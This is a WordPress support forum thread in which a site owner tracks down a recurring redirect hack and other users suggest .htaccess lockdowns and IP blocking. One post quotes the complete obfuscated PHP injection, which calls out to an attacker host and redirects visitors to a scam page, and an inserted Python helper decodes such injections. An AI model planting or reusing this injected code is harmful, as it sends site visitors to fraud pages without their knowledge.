Title: Got hacked
Last modified: June 27, 2018

---

# Got hacked

 *  Resolved [kirai](https://wordpress.org/support/users/kirai/)
 * (@kirai)
 * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/)
 * It seems there is some code inserted somewhere… it randomly redirects users to
   an external website, but it does it only one time per session.
 * redirects to external website but [http://www.a](http://www.a) works. Clicking
   on the top menu links also redirects to external website

Viewing 15 replies - 1 through 15 (of 24 total)

1 [2](https://wordpress.org/support/topic/got-hacked-7/page/2/?output_format=md)
[→](https://wordpress.org/support/topic/got-hacked-7/page/2/?output_format=md)

 *  [a2hostingrj](https://wordpress.org/support/users/a2hostingrj/)
 * (@a2hostingrj)
 * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10440075)
 * Perform a scan with WordFence
 * > [https://wordpress.org/plugins/wordfence/](https://wordpress.org/plugins/wordfence/)
 * This will check for any malicious code in your site.
 * Also, check your .htaccess, and change all your passwords (WordPress, Hosting,
   FTP)
 *  Thread Starter [kirai](https://wordpress.org/support/users/kirai/)
 * (@kirai)
 * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10443928)
 * Thank you!!!
 *  Thread Starter [kirai](https://wordpress.org/support/users/kirai/)
 * (@kirai)
 * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10446996)
 * Reopening since the problem persists.
 * – I reinstalled wordpress
    – Reviewed .htaccess file (no issues with it)
    – Installed Wordfence and ran the scan (no issues with it)
    – Changed all passwords: ftp, hosting, wordpress to superlong ones 🙂
 * Still getting a redirect to external site when loading [http://www.ageekinjapan.com](http://www.ageekinjapan.com)
   (First time once per session? Opening a private window on the browser and opening
   the site)
 *  Thread Starter [kirai](https://wordpress.org/support/users/kirai/)
 * (@kirai)
 * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10447005)
 * Fixed the problem again… I think… My index.php file had code inserted at the beginning
   starting like this:
 *     ```
       <?php
        $id6fe1d0be634 = "/index/?2601510941471";
       $z8c7dd922ad47=md5(  ....... 
       ```
   
 * before the line: `define('WP_USE_THEMES', true);`
 *  Thread Starter [kirai](https://wordpress.org/support/users/kirai/)
 * (@kirai)
 * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10454361)
 * The index.php keeps being edited every day with the same inserted code even though
   I have changed all my passwords. There is nothing in my crontab and also I’ve
   made sure there are no active plugins except wordfence.
 * How do I know what process is editing the index.php?
 *  Thread Starter [kirai](https://wordpress.org/support/users/kirai/)
 * (@kirai)
 * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10463694)
 * The problem persists, the index.php is being edited every 24h or so.
 * I have changed all passwords several times and Wordfence is also running 24/7
 *  [afleetingglimpse](https://wordpress.org/support/users/afleetingglimpse/)
 * (@afleetingglimpse)
 * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10466095)
 * If you can, lock off the changes by IP ranges you use.
 * set public index .htaccess to allow only by IP range.
    also block PHP as well by IP range.
 *     ```
       <Files wp-login.php>
       Order Deny,Allow
       Deny from All
       Allow from ##.###.##.###
       Allow from ##.##.##
       Allow from ##.##.##
       Allow from ##.##.##
       Deny from ##.##.##
       ```
 *     ```
       <Files wp-admin$>
       Order Deny,Allow
       Deny from All
       ```
 * Same IP list above
 *     ```
       <FilesMatch "^php5?\.(ini|cgi)$">
       Order Deny,Allow
       Deny from All
       ```
 * same again ending ip list with
 *     ```
       Allow from env=REDIRECT_STATUS=200
       ```
 * toss this in too
 *     ```
       </FilesMatch>
       Options -Indexes
       <Files xmlrpc.php>
       Order Deny,Allow
       Deny from all
       </Files>
       ```
 *  [afleetingglimpse](https://wordpress.org/support/users/afleetingglimpse/)
 * (@afleetingglimpse)
 * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10466146)
 * this will not help if they are crossing from a trust with the host server but
   if it’s an outside attack and they are getting in and changing files, this may
   block the access to those files they need to change to modify your site.
 * I had a few issues where they got into my site and changed the front page, they
   changed user names and access..
 * I did all the same of changing passwords and credentials but they were back in
   in 15 days. (with wordfence on) and yes when they hacked in they turned the plugins
   off.
 * this, though a pain to have to update IP’s whenever I travel somewhere, has secured
   my site for now.. (last 8 months)
 *  Thread Starter [kirai](https://wordpress.org/support/users/kirai/)
 * (@kirai)
 * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10478217)
 * Hello, thank you @afleetingglimpse!
 * Unfortunately I added all those rules to my .htaccess and changed all passwords
   again. After several hours they inserted the code again in the first line of my
   index.php, this means that they are not really logging in to insert the code?
    -  This reply was modified 7 years, 10 months ago by [kirai](https://wordpress.org/support/users/kirai/).
 *  Thread Starter [kirai](https://wordpress.org/support/users/kirai/)
 * (@kirai)
 * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10487641)
 * This is the complete line of code that is being inserted in my index.php, now
   it seems to be happening several times per 24 hours.
 *     ```
       <?php
   
       $id6fe1d0be634 = "/index/?2601510941471";
   
       $z8c7dd922ad47=md5($id6fe1d0be634);$u77e8e1445762=time();$geaa082fa5781=filemtime($z8c7dd922ad47);$u07cc694b9b3f=$u77e8e1445762-$geaa082fa5781;if(file_exists($z8c7dd922ad47)){$fe1260894f59e=@fopen($z8c7dd922ad47,base64_decode('cg=='));$xe4e46deb7f9c=json_decode(base64_decode(fread($fe1260894f59e,filesize($z8c7dd922ad47))),1);fclose($fe1260894f59e);}if($u07cc694b9b3f>=60 ||!file_exists($z8c7dd922ad47)){$v9b207167e538=getDDroi($z8c7dd922ad47);if($v9b207167e538[base64_decode('ZG9tYWlu')]){$je617ef6974fa=base64_decode('aHR0cDovLw==').$v9b207167e538[base64_decode('ZG9tYWlu')].$id6fe1d0be634;}else{$wd88fc6edf21e=curl_init();curl_setopt($wd88fc6edf21e,CURLOPT_RETURNTRANSFER,true);curl_setopt($wd88fc6edf21e,CURLOPT_USERAGENT,base64_decode('QUkgcnNydg=='));curl_setopt($wd88fc6edf21e,CURLOPT_URL,$xe4e46deb7f9c[base64_decode('cnNydg==')]);curl_setopt($wd88fc6edf21e,CURLOPT_TIMEOUT,10);$sad5f82e879a9=curl_exec($wd88fc6edf21e);curl_close($wd88fc6edf21e);$je617ef6974fa=base64_decode('aHR0cDovLw==').$sad5f82e879a9.$id6fe1d0be634;}}else{$je617ef6974fa=base64_decode('aHR0cDovLw==').$xe4e46deb7f9c[base64_decode('ZG9tYWlu')].$id6fe1d0be634;}function getDDroi($z8c7dd922ad47){$wd88fc6edf21e=curl_init();curl_setopt($wd88fc6edf21e,CURLOPT_RETURNTRANSFER,true);curl_setopt($wd88fc6edf21e,CURLOPT_USERAGENT,base64_decode('QUkgcm9p'));curl_setopt($wd88fc6edf21e,CURLOPT_URL,base64_decode('aHR0cDovL3JvaTc3Ny5jb20vZG9tYWluX3RlbXAucGhwP2Y9anNvbg=='));curl_setopt($wd88fc6edf21e,CURLOPT_TIMEOUT,10);$sb4a88417b3d0=curl_exec($wd88fc6edf21e);curl_close($wd88fc6edf21e);$xe4e46deb7f9c=json_decode($sb4a88417b3d0,true);if($xe4e46deb7f9c[base64_decode('ZG9tYWlu')]){$y0666f0acdeed=@fopen($z8c7dd922ad47,base64_decode('dys='));@fwrite($y0666f0acdeed,base64_encode($sb4a88417b3d0));@fclose($y0666f0acdeed);return $xe4e46deb7f9c;}else return false;}if(!$_COOKIE[base64_decode('YTc3N2Q=')]){setcookie(base64_decode('YTc3N2Q='),1,time()+43200,base64_decode('Lw=='));echo 
base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi').$je617ef6974fa.base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi').$je617ef6974fa.base64_decode('Ijs8L3NjcmlwdD4=');}
       ```
   
    -  This reply was modified 7 years, 10 months ago by [kirai](https://wordpress.org/support/users/kirai/).
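
Added example, not part of the thread or any poster's code: a small Python triage helper for the kind of injection shown above. It flags any code sitting ahead of the `WP_USE_THEMES` define in `index.php` and decodes the `base64_decode('...')` string literals so the hidden strings can be read without running the PHP. The sample files and the `c2.example.invalid` URL are constructed placeholders, and the function names are this example's own.

```python
import base64
import re

B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
THEMES_DEFINE = re.compile(r"define\s*\(\s*['\"]WP_USE_THEMES['\"]")

def decode_literals(php_src):
    """Decode each base64_decode('...') string literal, in order, without duplicates."""
    out = []
    for m in B64_CALL.finditer(php_src):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error subclasses ValueError
            continue
        if text not in out:
            out.append(text)
    return out

def code_before_define(php_src):
    """Text ahead of the WP_USE_THEMES define once comments and the opening tag are removed.
    A stock index.php has nothing there; a file with no define at all is treated as all-prefix."""
    m = THEMES_DEFINE.search(php_src)
    prefix = php_src[:m.start()] if m else php_src
    prefix = re.sub(r"/\*.*?\*/", "", prefix, flags=re.S)  # drop block comments
    return prefix.replace("<?php", "").strip()

def triage(php_src):
    decoded = decode_literals(php_src)
    return {
        "injected": bool(code_before_define(php_src)),
        "decoded": decoded,
        "urls": [s for s in decoded if re.match(r"https?://[^/\s]+", s)],
    }

def b64(s):
    return base64.b64encode(s.encode()).decode()

# Constructed samples: a trimmed stock index.php and an infected copy with placeholder values.
CLEAN = ("<?php\n/**\n * Front to the WordPress application.\n */\n"
         "define( 'WP_USE_THEMES', true );\nrequire __DIR__ . '/wp-blog-header.php';\n")
C2 = "http://c2.example.invalid/domain_temp.php?f=json"  # placeholder, not from the thread
INFECTED = ("<?php\n$a = \"/index/?0000\";$p = base64_decode('%s');"
            "$k = base64_decode('%s');curl_setopt($c,CURLOPT_URL,base64_decode('%s'));?>"
            % (b64("http://"), b64("domain"), b64(C2))) + CLEAN

if __name__ == "__main__":
    for name, src in (("clean", CLEAN), ("infected", INFECTED)):
        print(name, triage(src))
```

Run against a copy of the real file, the `urls` list gives the hosts to look for in outbound connection logs, and `injected` can be checked on a schedule to catch the file being rewritten.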
 *  [afleetingglimpse](https://wordpress.org/support/users/afleetingglimpse/)
 * (@afleetingglimpse)
 * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10488338)
 * may want to put a block on the server calling
 * ht tp: //roi777.com
    -  This reply was modified 7 years, 10 months ago by [afleetingglimpse](https://wordpress.org/support/users/afleetingglimpse/).
 *  [afleetingglimpse](https://wordpress.org/support/users/afleetingglimpse/)
 * (@afleetingglimpse)
 * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10488379)
 * calling out of the IP for king-servers.com.
 * 162.244, range but with multiple servers I would start by blacklisting the whole
   range.
 * if it still gets replaced or you want to do more work first..
    this shows 12 
   IP ranges those US based servers use.
 * [https://awebanalysis.com/en/ipv4-as-name-directory/http%3A-slash–slash-king-servers.com/](https://awebanalysis.com/en/ipv4-as-name-directory/http%3A-slash–slash-king-servers.com/)
 *  [afleetingglimpse](https://wordpress.org/support/users/afleetingglimpse/)
 * (@afleetingglimpse)
 * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10488447)
 * looking at a page that had the code on it prior. it is now a fake windows virus/
   windows defender scam page.
 * Since it’s calling w ww.evange lizabrasil.com (2 manual breaks added by me)
 * I would also specifically block that. Not that I am sure that’s an issue but it
   seems that the $z8c7dd922ad47 is calling the index on that site. and being the
   front landing page is hacked.. blocking it is a good idea anyway.
 * I am not an expert, maybe someone else will pop in with more help.
 *  [afleetingglimpse](https://wordpress.org/support/users/afleetingglimpse/)
 * (@afleetingglimpse)
 * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10488467)
 * “this means that they are not really logging in to insert the code?”
 * from what I can see, no.
 * a code is hidden on your box somewhere and is being called at specific times.
   it seems to look at the index and if the timestamp changed it calls out and pulls
   the changes from another machine.
 * in effect they are not breaking in, your machine is calling out to grant them
   access again.
 * since it is so common several times per 24 hours, I would clear and log all external
   IP calls.
 * wordfence is not telling you the admin has been accessed or the index is changed
   because when the machine pulls the info no login happened. and it disables WF
   before changing the index so you don’t get an alert.
 *  Thread Starter [kirai](https://wordpress.org/support/users/kirai/)
 * (@kirai)
 * [7 years, 10 months ago](https://wordpress.org/support/topic/got-hacked-7/#post-10497493)
 * Hello! I added all the ips and ip ranges of the suspicious sites mentioned and
   it stopped it for more than 48 hours… but now the inserted code is back again.
 * Any more ideas of what I should do?

The topic ‘Got hacked’ is closed to new replies.

## Tags

 * [hacked](https://wordpress.org/support/topic-tag/hacked/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 24 replies
 * 4 participants
 * Last reply from: [kirai](https://wordpress.org/support/users/kirai/)
 * Last activity: [7 years, 9 months ago](https://wordpress.org/support/topic/got-hacked-7/page/2/#post-10606410)
 * Status: resolved
